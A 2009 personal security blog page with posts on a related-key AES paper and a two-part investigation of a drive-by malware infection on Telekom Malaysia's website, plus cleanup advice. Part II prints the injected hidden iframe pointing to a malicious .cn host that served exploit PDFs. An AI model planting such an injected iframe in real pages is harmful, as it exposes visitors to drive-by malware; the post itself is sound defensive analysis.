Skip to Content

Related-key Cryptanalysis of the Full AES-192 and AES-256

2 July, 2009 - 23:44

Cryptographers Alex Biryukov and Dmitry Khovratovich has recently published a paper called "Related-key Cryptanalysis of the Full AES-192 and AES-256". In this paper they present two new related-key attacks on the full AES that are better than brute force with a complexity of 2^119.

Here is the abstract:
Abstract. In this paper we present two related-key attacks on the full
AES. For AES-256 we show the rst key recovery attack that works
for all the keys and has complexity 2^119, while the recent attack by
Biryukov-Khovratovich-Nikolic works for a weak key class and has higher
complexity. The second attack is the rst cryptanalysis of the full AES-
192. Both our attacks are boomerang attacks, which are based on the
recent idea of finding local collisions in block ciphers and enhanced with
the boomerang switching techniques to gain free rounds in the middle.

Bruce Schneier has something to say about it here in his blog.

TMonline is a harmful website!!??? (Part II)

27 June, 2009 - 02:25

I have been looking more into the matter of www.tmonline.com.my and found some more answers.

In the source code of the website, I found this:
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"><iframe src="http://gianthighest.cn:8080/index.php" width=120 height=176 style="visibility: hidden"></iframe>
<div align="center">

OK, so what is this gianthighest.cn? It doesn't seem to belong to TM.

Going to the site, I didn't get any clues as I got a blank page. So that was disappointing... I was expecting to see some code. So I searched for more information.

Google has a tool called a safe browsing diagnostic tool. To use the tool, just append a URL to the end of http://www.google.com/safebrowsing/diagnostic?site=. So lets test... http://www.google.com/safebrowsing/diagnostic?site=www.tmonline.com.my. Here is the result.

Here we see that malicious software is being hosted on gianthighest.cn. And google confirms that when they visited the site, 2 out of 3 pages tested resulted in malicious software being downloaded and installed without user consent.

Ok, good we are getting somewhere maybe here.

After getting to lots of dead ends, I finally found something called .cn iframe attacks. Here are the links: http://blog.unmaskparasites.com/2009/06/25/hidden-cn-iframes-are-still-p... and http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from...

Basically what is happening is, as the code I pasted above indicates, there is a hidden iframe that was injected to the website. This iframe redirects to a script that checks for plugins installed on your browser. Depending on the results of this check, it will either download a malicious PDF or SWF file.

What I detected was the PDF file, and got similar results as what was posted on http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from.... Stack based buffer overflow.

A check on www.tmonline.com.my using Unmask Parasites tells me:

This page seems to be <suspicious>
1 hidden external link found.
Google currently lists this page as suspicious*

And it goes on to give me a detailed security report what is suspicious on the page. Here is a screenshot.

If your server has been compromised, you can clean your server by doing the following (taken from http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from...):

  1. Start with your own computer. Scan it with anti-virus and anti-spyware tools.
  2. Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)
  3. Now keep the new passwords secure. Don’t use auto-upload features of your web site editors. Enter passwords every time you upload new content instead. Use SFTP instead of FTP if possible.
  4. Now remove the malicious code (the iframes) from your files on server. The easiest way to do it is upload a clean content from a backup.
  5. Scan your server directories for any new/suspicious files (don’t forget to check hidden files). Remove anything that should not be there.
  6. If your site was flagged by Google, request a malware review via Webmaster Tools.
  7. Regularly check your site with diagnostics tools of your choice (Unmask Parasites can be one of them) to be sure your site is clean.

Good.

Now how do we report this to TM? Can anybody tell me or help out, please?

TMonline is a harmful website!!??? (Part 1)

26 June, 2009 - 23:16

H.S. Tan, a friend of mine, sent me an email to me today. He said that he googled "tm online" and the first result he got pointed to www.tm.online.com.my (please be careful when navigating to this site). But there was a problem. Google reports "This site may harm your computer.". So he was concerned on whether the website got hijacked.

Telekom Malaysia (TM) is the biggest ISP in Malaysia, so it would be serious if there was something wrong on this website since lots of people would be visiting it. So I set about on figuring out why Google says this site is harmful. What I found is a bit shocking.

Below was my answer to him.

Yes, it is a malicious website :) No, really it is. Below is my brief analysis after looking at the site for a few minutes.

The thing is... on this website there is a an exploit that is being called Exploit.JS.Pdfka.lr. You might not see it, but whenever you visit the site, your browser will automatically and unexpectedly download a PDF. There is a big chunk of obfuscated javascript in the PDF. If you are on Windows and you are using Adobe Acrobat, this file might cause Acrobat to stall while it does its malicious tasks.

There are many versions of this PDF exploit already in the wild. I don't know what this particular version of the exploit does as there is very little information about it. There are versions that attempt to write files to your hard drive. There are also versions that put an extra task on your computer (if you view the Task Manager) and attempt to send out spam.

Adobe has released security updates for their software in response to these PDF exploits. So make sure you install Adobe's updates. Other PDF viewers should have similar security updates as well.

Some notes:

- If you are using Windows on a limited account, you are golden and it is a very wise decision. NoScript in Firefox and AdBlock or AdBlock Plus is good too. Having good anti-malware and anti-virus software installed will also help.

- I wonder what TM is trying to do on their website. Hmm...

- I would like to get the malicious code and deobfuscate it. I'm still wondering how I can do this. I need to study and do more research.

Update: I did more research. A part II is now available here.

azrinmadin.com is back!

26 June, 2009 - 23:06

Hello there!

Yes, azrinmadin.com is back. I've deleted all the old content and will write up new articles here. The old content wasn't much anyway, only a few blog entries related to several security news but wasn't updated often. In this new site, there will be new sections so that content won't be as mixed up as before.

So what am I going to put on here? Well, just some thoughts and ideas on stuff that I deal with every day. Mostly it will be security related.

I will try to update often.

Syndicate content


Theme by Dr. Radut.